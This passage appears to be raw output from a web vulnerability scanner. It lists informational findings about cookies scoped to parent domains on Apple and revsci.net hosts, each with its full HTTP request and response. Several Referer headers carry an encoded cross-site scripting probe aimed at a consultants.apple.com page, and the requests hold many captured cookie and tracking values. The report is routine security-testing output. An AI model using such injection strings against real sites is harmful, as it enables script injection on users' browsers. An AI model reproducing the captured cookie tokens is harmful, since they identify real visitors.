Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT
If-None-Match: "230-4a05bce73b440"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT
ETag: "230-4a05bce73b440"
Cache-Control: max-age=369
Expires: Tue, 19 Jul 2011 18:56:49 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=LEJBEBcQgxjRsTTCyAyYKhmrQ29mZ0tWZB2LLEvwBvmGhUolex0IKN0tkOfWn0IRDQecZ7oWhs+BcY4jVyGVZNnMltnMRgtSDqGLLt0A4dQCM2dk3XSM93IAotSYgDtChyr6vB5EnIx9I8BGt1w+NV02BAMXRHFAU5KKQ4pDq9PYwMmpFhrmYVnkmPEB2wSd7jOCQIIo8SG+3fCB93TKfTnFPl9XC3aBtShw+7JTPold2YkZobB1eP4vaaNyiXG4r+vGIDmVsy3H0bmCQBzD3QOMbB69nwIgfE4xTPT3Muku37mGY1aulIO/b39sugY/NrWIYfVq+MAcTRJri8mruMiZnOozdqngIcCl/rtx2fq/XcoYRslIgp8Oalavojqcq18SDeyDaBRoC8ECx0aoKp9VOnMeqA2aWHzunbVZ/SUNoqg02qeRYmaNIbv/S56XrUylAt3mdz56r9MHZeDu/qMb98o3CXzRVtubBHxcbZ33NfYY2HWiZqpqNM2T45275YqvYQu325MjTG59ZL2p346RvTxqFT3xE0jLl2080M5vX04ea4TN8q2cR1qNhiJR; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.71. http://images.apple.com/global/scripts/swap_view.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/swap_view.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/swap_view.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sun, 05 Jun 2011 18:21:01 GMT
If-None-Match: "101b4-4a4fb0c8a9d40"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sun, 05 Jun 2011 18:21:01 GMT
ETag: "101b4-4a4fb0c8a9d40"
Cache-Control: max-age=383
Expires: Tue, 19 Jul 2011 18:57:03 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=DgFhV0K9vbrLvIKQ/ohaOrDgNrbgYzv038niR20mFJ1TeNIhlRS9Akj+VtmF8/YQWH6+TNwMCIJ/xwlSCj/VZ1QqQKKs+9YCHrWJbbBxrMcbKZzNJ/6jo0ef9WBeJMnKqyGXCTM6W6zU3KzNsKGRem5F2gKN8NiYS0vlDCU9abaven2AVH4YHwSKZoN5M5nOz/bvqYPvJoLLAI5KMFCwoFqjO92pnNnaIVTmO+nRpkl9Xy7SRXKDz9LDw58cFhuIMCrfK3GMHYIxv/NVeZZVIp+cdFy0jBUg25LC58XbP7o3ZpULlNf/iTECsydJmsrkK8DRdnjNm797Ts5WfBSHzvqYysZ1ZSU0a77CxWOTy64eM9Nwh714ihKnzZQi/Bp0B+7uUCcfswE3pgUVYGBSSrSE+QqssPiwzB2j51Q7637zezmWRBhG4gQ1z+7+AzsneClCGUjhtzwzW9clgcVnAUXCKluCDdrjw0eHDKx/fJNE65vLnnXUju0pk98x8W6EeXy/Lb42sLCsZAyYODkBTD1j33V98NyncjXmtB6rQnQWxLPfoSpKcTY+knm4sbyP; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.72. http://images.apple.com/global/scripts/view_master_tracker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/view_master_tracker.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/view_master_tracker.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 28 Apr 2011 22:13:30 GMT
If-None-Match: "243c-4a201ddff3680"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 28 Apr 2011 22:13:30 GMT
ETag: "243c-4a201ddff3680"
Cache-Control: max-age=398
Expires: Tue, 19 Jul 2011 18:57:18 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=xLxcwxCeTU+HYfHdmg/XQ8YHOoiJO9noVqYg78e8+UwdNUwRLNGUneo/H/zqR6hX6hwuFlGm33hlyD+iHOcu2Nz05YIPyfnvB7M7c+5fPVLYhQdWWcR9Vx9fVRfrc5gt7rzuGzLi8pq+ksSNXMMYXeztRsf5amVS0qX/jE9IqXzFeyUzRF5QNcIFGUpQYa4c8+MMVeVWYo4wLZP+6fr4/mKawRV5fhRfA16jKNYam9mElYTBhrtroIu+IP9hM2zUmpjHPFZwQv7j/hs+F+B8paUkojp3Qle7GfRR8YNkZJ3MoYnxIb5yJLXQn9EZxYG6PB3v5k55MOj3vyPQeMWEr2EYhIgHSgTFSxSKp30GRFQYQ1Xal8nUiCv/kLGbCEz6Rmh4rTkVYAUvVmFc0l4fiUEWPgByZjpkVvevgCKRSi3mA+v14EJ6g8fw5nxnUsEaivwDP0a5V/StziMyyqofL7v4N+VFH/VfQasfZ04ORMFy40xFvWNSDWmObK+KZOFDgy4tcRNpIlxvdwe0F4BBHaa/wNVIDWdQKtGjCEeFPQuE7i5E2HlkgivW1oGtcdWT; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.73. http://images.apple.com/macpro/scripts/pagenav.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /macpro/scripts/pagenav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/pagenav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Sun, 13 Jan 2008 02:48:33 GMT
If-None-Match: "7ca-4439198664240"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Sun, 13 Jan 2008 02:48:33 GMT
ETag: "7ca-4439198664240"
Cache-Control: max-age=362
Expires: Tue, 19 Jul 2011 18:56:42 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=ZHzTaP/phyT7ZztWPfF5YV5rnLeKreE+BudU5VhJnvfzQE8c76KGu5bYP2Jzb5XcPvR/RMzLRmQ5vbPj28VAYRnqDE3wGY9bhnVVrx+x7BRNhOYCye0Q/zuhgPrHaJxpN93Aehy4J54iy2k6AGj85umsg42TuAZ8IM0dASMUW6L3nymXapXlPmi9fO7CsBm3tuoQFaO5QxnFQ8v7rYtrI2X0RWi2L7JSVaEEcf17F98FUrdpo35pmpAJNA9vNteKaT+fqJpnmhwsPxwRjmJW+9fx5oU6d2BipKOTqedPxNZ1yM5XchWp/bDANVriSqcdjdMmn4cZ5KfY0n/7UUQ3yHsNBxEAudwcCY0zkX1yl+F56vNE78bLS/l6ffsqlEADXYVG4dYfvWaYqT90FPcrQbIaZVZTG+nrj6rnAcxbkyzIy0RGpslI7/qF77mmUd8g6aQ/dqf60BZbFAJrQwTahUZDJcf7IFyI5SiDn8Y/MGBKwK2Tksrb1kC073U8KfGOsjUQtAP7mPjp/L+NoCYoC4MLbDi+AE7LaFApk3Z8zu6U7az+j+Bdv62J564xGR99; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.74. http://images.apple.com/macpro/scripts/performance.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /macpro/scripts/performance.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/performance.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert%28document.location%29%3C/script%3Ec29f000149b
Cookie: s_cvp35b=%5B%5B'www.fakereferrerdominator.com'%2C'1310698467867'%5D%2C%5B'OAS-US-DOMAINS-mac.com'%2C'1310703720371'%5D%2C%5B'oas-us-domains-mac.com'%2C'1310703744694'%5D%2C%5B'www.fakereferrerdominator.com'%2C'1310911506300'%5D%2C%5B'OAS-US-DOMAINS-guide.apple.com'%2C'1310911669487'%5D%5D; s_vnum_us=ch%3Dsupport%26vn%3D8%3Bch%3Dsafari%26vn%3D2%3Bch%3Ddeveloper%26vn%3D4%3Bch%3Dbuy%26vn%3D2%3Bch%3Dsearch%26vn%3D1%3Bch%3Dhomepage%26vn%3D2%3Bch%3Dicloud%26vn%3D2%3Bch%3Dcontact%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dmyappleid.iforgot%26vn%3D4%3Bch%3Dmac%26vn%3D1%3Bch%3Dmacosx%26vn%3D2%3Bch%3Djobs%26vn%3D1%3Bch%3Dretailstore%26vn%3D1%3Bch%3Dtrailers%26vn%3D1%3Bch%3Dipod%26vn%3D1%3Bch%3Ditunes%26vn%3D2%3Bch%3Dmyappleid%26vn%3D2%3Bch%3Dali%26vn%3D2%3Bch%3Daccess%20management%26vn%3D1%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dmacosx.downloads%26vn%3D1%3B; s_vi=[CS]v1|27065B988515A4F3-400001A7E000BF83[CE]; POD=us~en; ac_search=xss%7C%7C%7C%7Cxssxss; dssid2=ab5a5410-d10e-4162-a971-27aa89f1d005; ac_survey=1; s_membership=1%3Aaid; dslang=US-EN
If-Modified-Since: Thu, 18 Nov 2010 00:36:10 GMT
If-None-Match: "1155-49548f9ebb280"

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 18 Nov 2010 00:36:10 GMT
ETag: "1155-49548f9ebb280"
Cache-Control: max-age=111
Expires: Tue, 19 Jul 2011 18:52:31 GMT
Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=huWud6MKM7fGr0sLtRFuzkknrgsqAUkTp5IgBXkjCJaXl1aBa2/a1BTGEGc6O2eGT1eLV6q4Dy5MBqDybpe/t+hzl8OwCOE533KhHnYrArt9HgSVUjzpYV8BY2XC/2FgpB5CiaviiqCklljw6gCQppgmf301SbQsao3jTu8JT28V5D++bg4X/u7IqczRA+pCv/AEKmcJV9srYhH/qlNZ7tBqNPtTMu1U4xT08moPm4Y4Ch/OYdqCwrk81oJzey2qnZdg6xTi8vobg+YNRJX9aNVT3l/iQfBmQR8nrLQCxIfls1E30U4qkqvqndWd6WsgqCEpREkk+78aS/kgGNXYWlKuHD/1zX7CxFAIQSOcb9AQDJV4rZoYSi8v3O2dsqVYzRKsE8Ai4wLbk8hpZV+dbBtMzaSUTxBSc2yw69wZ2Ipmon6WGQhryD0tKpL7OtTNgqYdcbQ3laI4KTk4JXZ9o38DMubgklNazzhfx8w2ERFgv9vPYx2+BrY5ltemg5F8DAZcU43GXtzMHdW+dsyRXnabk9Lu6RdwhM+HaUARBVzZ9te0DlM9fMQ6i8/OIGSj; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com


13.75. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=C07583&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=MLun+AU1Zjhl58oJicYDKGOoh+glpORtThzANG1aBfZBrT1crkG1BbCYM408CuN9lQbF3aP4vgOJ1mIVRcbsqnd9em7gDHA1TIoEl2KoI2SgU4DA5EF1lXVsqfuVtURUfDlRbGMIwrPXqkTQ7ha/uqz9AYieh57Wl1R1Y1jVlCJtFijCZov3GG+/HzEWJJFPsshjNe+eXiR9QaN+nFIQwIuAnqrWN6OLs2utUQX1qLlAizz5SX1DY4ezfOcpkCrgkFCpWD1jpxUFSBd9kT0QO8lfwgL+MKkmgv9YurmtGVl4mgRDUrqi4EV2vm7677NG43lfljF81/2h3UQcvWTCROqFLqGTTGw9i7uhLLM9wmD6qiJYd+A504GkQmipymnz4zz+KJVBtht6ODBDRjch1v/Q9H0EVzkVdMH7LlvacBN6xVxFpq0/5sv3kFv9nQqHAD638rIvnoV5vHJmPEsSTPDQprR3Cqi6aS3z3efJB5Fe7NRa2Wxaw2lEgG+sN2BcFPE3dtH/7Hw70JwZoyPxbdbklPDPhWAaH0Q2BIFPO8C3p6hVpULE/9z53nAuqfuY4vymzFXDyY9vGdOvfsfoNe9C0w+FabpojVLoaKoHptlOSMDYPZV/Tmm8gD0qbz9Ql+737ttzGuAFouNSyp3mTuINVV/NGeiFZ/hPZyCj17mR7wGzyRp2a2Ayh6cUWQItrXRbEO4q19f7HHQfrXQmkxlZVigNiwD9Adfyt3Ltb9FpXu0LHvZiWWFy0I61APUr7NBHxEgIZw46qoJ3nPyYxEsj9BaAeIRk1MGz7wcwDToHsHSSqclZMH63LaUKE9lSpHKXI9N4/lZFyVpCAmpleREtf8uJwlmlrH7LSJFzPOUejuyk6cV/yIrEYLNDobIpwaLJfW+aA7kQa5TOfIWyiJpFE+znSHCvUDMrzXCYGcwryPSVn0y4vaOJrb15tx6uXNyTNhIGWsuRS4X2nehD4DtnkPoX8J+kXyt2hXK15AsoHvf8vIEOrlLEYyW2lgmGfPIScNIGRR/LpqazqArriUMpoAe9y5quzvOF0pgu6KaxnaEGxDXtvrorocQQjCjQEBaGndZRD1AJFydMGagXHQCeAXyAUge9JwnR+JCc8A9PmGUXemuw6Xmpt8F2OCf7AUBLGvy/7qHU7bKgSdmmU/YXzZvgOplXBEbBLHVd9w8j8s1y41e6E6ygpcY0ziyhak30QJ4m4hb2y3p2Z7Jr2UYsFVG/vCZB7Ma84+y0dbCQj0nIgGOKn0WdNTKrBp1drfs9H3cR0aBkJEne6gtaR9mqBVLY/5/uO+xBrKYkwbuz+6Zcxfd7iFmwF3/BCe26D3XSGXu27HurLfKh9HEBj80ZkgNwuGYAgRXr6eygjGOhv0hXPRfLc9VamnSwbqghNp9iUnPQheiFsUsThmt2sBOizCIyoQfW9Le0xoQRlfHkPVMUo87qFV1kwP5l9iUbRQczBKSINQMQbXRE6uN9Trke/NgKMHmePXzZdgwXPn2biHLED0X65s20eLfKWWD/i2ElfUNbrUhmIefj2nx6JZ4pdTdFNEKEC6lNPwUSbocNRKniI55PZ80fepxvYPyy5JdjS/7k8+vlvfDvbwGW7G7zQE68+agOyeCte/gP9X2H90N5DNmlOIxl3JnkNSoHSvrtKZM8zNqjkFv+gI5gb/ulUVbgRx/QAjlr6vkYKtm43uhLodF6M9YjmiD3i0tn33iQlFWrOMcJRoCElQ30CXCwM3ErZNwvD34sAkYLvgF1/TdrxOudjHlA4m/AYpP15ZL1fiiXYl11HYF49Ln0giCylL5k8KKkA3RtxBFoMpjMnNNSiFB3DAGjjgXfWCuGHydYc+9/EK8zUo4iohiGZiR6VDz/jeQ61jGMvfjDpD/m9F5eObUjm17xme9ojRoiv3UDPLTaaTfrD78vbBSLKDWybaIcL7jFL4cBbHqUuQjnIEafWTyFMctqyf+sirJi8V2sCI